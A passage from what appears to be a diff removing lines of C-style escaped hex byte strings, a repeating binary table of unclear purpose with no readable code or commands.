-"\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00"
-"\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00"
-"\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00"
-"\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00"
-"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00"
-"\x00\x00\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00"
-"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00"
-"\x00\x00\x20\x01\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00"
-"\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00"
-"\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00"
-"\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00\x99\x00\x00\x00"
-"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00"
-"\x00\x04\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00"
-"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00"
-"\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00"
-"\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00"
-"\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00"
-"\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00"
-"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00"
-"\x00\x00\x00\x00\x00\x00\x20\x01\xa9\x00\x00\x00\x00\x30\x00\x00"
-"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00"
-"\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00"
-"\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00"
-"\x99\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00"
-"\x00\x80\x01\x00\x00\x04\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00"
-"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00"
-"\x00\x00\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00"
-"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00"
-"\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00"
-"\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00"
-"\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00"
-"\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00"
-"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00"
-"\x00\x00\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00"
-"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00"
-"\x00\x00\x20\x00\x99\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00"
-"\x00\x80\x00\x00\x00\x80\x01\x00\x00\x04\x00\x00\x00\x00\x20\x00"
-"\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00"
-"\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00"
-"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00"
-"\x00\x00\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00"
-"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00"
-"\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00"
-"\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x01"
-"\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00"
-"\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00"
-"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00"
-"\x00\x00\x00\x00\x00\x00\x20\x00\x99\x00\x00\x00\x00\x30\x00\x00"
-"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00\x00\x04\x00\x00"
-"\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00"
-"\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00"
-"\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00"
-"\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00"
-"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00"
-"\x00\x00\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00"
-"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00"
-"\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00"
-"\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00"
-"\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00"
-"\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00\x99\x00\x00\x00"
-"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00"
-"\x00\x04\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00"
-"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00"
-"\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00"
-"\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00"
-"\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00"
-"\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00"
-"\x00\x30\x00\x00\x00\x00\x00\x00\xc2\x80\x00\x00\x00\x80\x01\x00"
-"\x00\x00\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00"
-"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00"
-"\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00"
-"\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00"
-"\x99\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00"
-"\x00\x80\x01\x00\x00\x04\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00"
-"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00"
-"\x00\x00\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00"
-"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00"
-"\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00"
-"\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00"
-"\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00"
-"\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x01\xa9\x00\x00\x00"
-"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00"
-"\x00\x00\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00"
-"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00"
-"\x00\x00\x20\x00\x99\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00"
-"\x00\x80\x00\x00\x00\x80\x01\x00\x00\x04\x00\x00\x00\x00\x20\x00"
-"\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00"
-"\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00"
-"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00"
-"\x00\x00\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00"
-"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00"
-"\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00"
-"\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00"
-"\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00"
-"\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00"
-"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00"
-"\x00\x00\x00\x00\x00\x00\x20\x00\x99\x00\x00\x00\x00\x30\x00\x00"
-"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00\x00\x04\x00\x00"
-"\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00"
-"\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00"
-"\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00"
-"\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00"
-"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00"
-"\x00\x00\x00\x00\x00\x00\x20\x01\xa9\x00\x00\x00\x00\x30\x00\x00"
-"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00"
-"\x00\x00\x20\x01\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00"
-"\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x01"
-"\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00"
-"\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00\x99\x00\x00\x00"
-"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00"
-"\x00\x04\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00"
-"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00"
-"\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00"
-"\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00"
-"\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00"
-"\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00"
-"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00"
-"\x00\x00\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00"
-"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00"
-"\x00\x00\x20\x01\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00"
-"\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00"
-"\x99\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00"
-"\x00\x80\x01\x00\x00\x04\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00"
-"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00"
-"\x00\x98\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00"
-"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00\x00\x98\x00\x00"
-"\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00"
-"\x00\x80\x00\x00\x00\x80\x01\x00\x00\x98\x00\x00\x00\x00\x20\x00"
-"\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00"
-"\x00\x80\x01\x00\x00\x98\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00"
-"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00"
-"\x00\x98\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00"
-"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00\x00\x98\x00\x00"
-"\x00\x00\x20\x00\x99\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00"
-"\x00\x80\x00\x00\x00\x80\x01\x00\x00\x9c\x00\x00\x00\x00\x20\x00"
-"\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00"
-"\x00\x80\x01\x00\x00\x98\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00"
-"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00"
-"\x00\x98\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00"
-"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00\x00\x98\x00\x00"
-"\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00"
-"\x00\x80\x00\x00\x00\x80\x01\x00\x00\x98\x00\x00\x00\x00\x20\x00"
-"\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00"
-"\x00\x80\x01\x00\x00\x98\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00"
-"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00"
-"\x00\x98\x00\x00\x00\x00\x20\x00\x99\x00\x00\x00\x00\x30\x00\x00"
-"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00\x00\x9c\x00\x00"
-"\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00"
-"\x00\x80\x00\x00\x00\x80\x01\x00\x00\x98\x00\x00\x00\x00\x20\x00"
-"\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00"
-"\x00\x80\x01\x00\x00\x98\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00"
-"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00"
-"\x00\x98\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00"
-"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00\x00\x98\x00\x00"
-"\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00"
-"\x00\x80\x00\x00\x00\x80\x01\x00\x00\x98\x00\x00\x00\x00\x20\x00"
-"\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00"
-"\x00\x80\x01\x00\x00\x98\x00\x00\x00\x00\x20\x00\x99\x00\x00\x00"
-"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00"
-"\x00\x9c\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00"
-"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00"
-"\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00"
-"\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00"
-"\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00"
-"\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00"
-"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00"
-"\x00\x00\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00"
-"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00"
-"\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00"
-"\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00"
-"\x99\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00"
-"\x00\x80\x01\x00\x00\x04\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00"
-"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00"
-"\x00\x00\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00"
-"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00"
-"\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00"
-"\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00"
-"\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00"
-"\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x01\xa9\x00\x00\x00"
-"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00"
-"\x00\x00\x00\x00\x00\x00\x20\x01\xa9\x00\x00\x00\x00\x30\x00\x00"
-"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00"
-"\x00\x00\x20\x00\x99\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00"
-"\x00\x80\x00\x00\x00\x80\x01\x00\x00\x04\x00\x00\x00\x00\x20\x00"
-"\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00"
-"\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00"
-"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00"
-"\x00\x00\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00"
-"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00"
-"\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00"
-"\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00"
-"\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00"
-"\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00"
-"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00"
-"\x00\x00\x00\x00\x00\x00\x20\x00\x99\x00\x00\x00\x00\x30\x00\x00"
-"\xb2\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00\x00\x04\x00\x00"
-"\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00"
-"\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00"
-"\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00"
-"\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00"
-"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00"
-"\x00\x00\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00"
-"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00"
-"\x00\x00\x20\x01\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00"
-"\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x01"
-"\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00"
-"\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00\x99\x00\x00\x00"
-"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00"
-"\x00\x04\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00"
-"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00"
-"\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00"
-"\x00\x80\x00\x00\x00\x80\x01\x00\x00\x98\x00\x00\x00\x00\x20\x00"
-"\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00"
-"\x00\x80\x01\x00\x00\x98\x00\x00\x00\x00\x20\x01\xa9\x00\x00\x00"
-"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00"
-"\x00\x98\x00\x00\x00\x00\x20\x01\xa9\x00\x00\x00\x00\x30\x00\x00"
-"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00\x00\x98\x00\x00"
-"\x00\x00\x20\x01\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00"
-"\x00\x80\x00\x00\x00\x80\x01\x00\x00\x98\x00\x00\x00\x00\x20\x01"
-"\x99\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00"
-"\x00\x80\x01\x00\x00\x9c\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00"
-"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00"
-"\x00\x98\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00"
-"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00\x00\x98\x00\x00"
-"\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00"
-"\x00\x80\x00\x00\x00\x80\x01\x00\x00\x98\x00\x00\x00\x00\x20\x01"
-"\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00"
-"\x00\x80\x01\x00\x00\x98\x00\x00\x00\x00\x20\x01\xa9\x00\x00\x00"
-"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00"
-"\x00\x98\x00\x00\x00\x00\x20\x01\xa9\x00\x00\x00\x00\x30\x00\x00"
-"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00\x00\x98\x00\x00"
-"\x00\x00\x20\x00\x99\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00"
-"\x00\x80\x00\x00\x00\x80\x01\x00\x00\x9c\x00\x00\x00\x00\x20\x00"
-"\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00"
-"\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00"
-"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00"
-"\x00\x00\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00"
-"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00"
-"\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00"
-"\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00"
-"\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00"
-"\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00"
-"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00"
-"\x00\x00\x00\x00\x00\x00\x20\x00\x99\x00\x00\x00\x00\x30\x00\x00"
-"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00\x00\x04\x00\x00"
-"\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00"
-"\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00"
-"\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00"
-"\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00"
-"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00"
-"\x00\x00\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00"
-"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00"
-"\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00"
-"\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00"
-"\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00"
-"\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00\x99\x00\x00\x00"
-"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00"
-"\x00\x04\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00"
-"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00"
-"\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00"
-"\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00"
-"\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00"
-"\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00"
-"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00"
-"\x00\x00\x00\x00\x00\x00\x20\x01\xa9\x00\x00\x00\x00\x30\x00\x00"
-"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00"
-"\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00"
-"\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x01"
-"\x99\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00"
-"\x00\x80\x01\x00\x00\x04\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00"
-"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00"
-"\x00\x00\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00"
-"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00"
-"\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00"
-"\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00"
-"\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00"
-"\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00"
-"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00"
-"\x00\x00\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00"
-"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00"
-"\x00\x00\x20\x01\x99\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00"
-"\x00\x80\x00\x00\x00\x80\x01\x00\x00\x04\x00\x00\x00\x00\x20\x00"
-"\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00"
-"\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00"
-"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00"
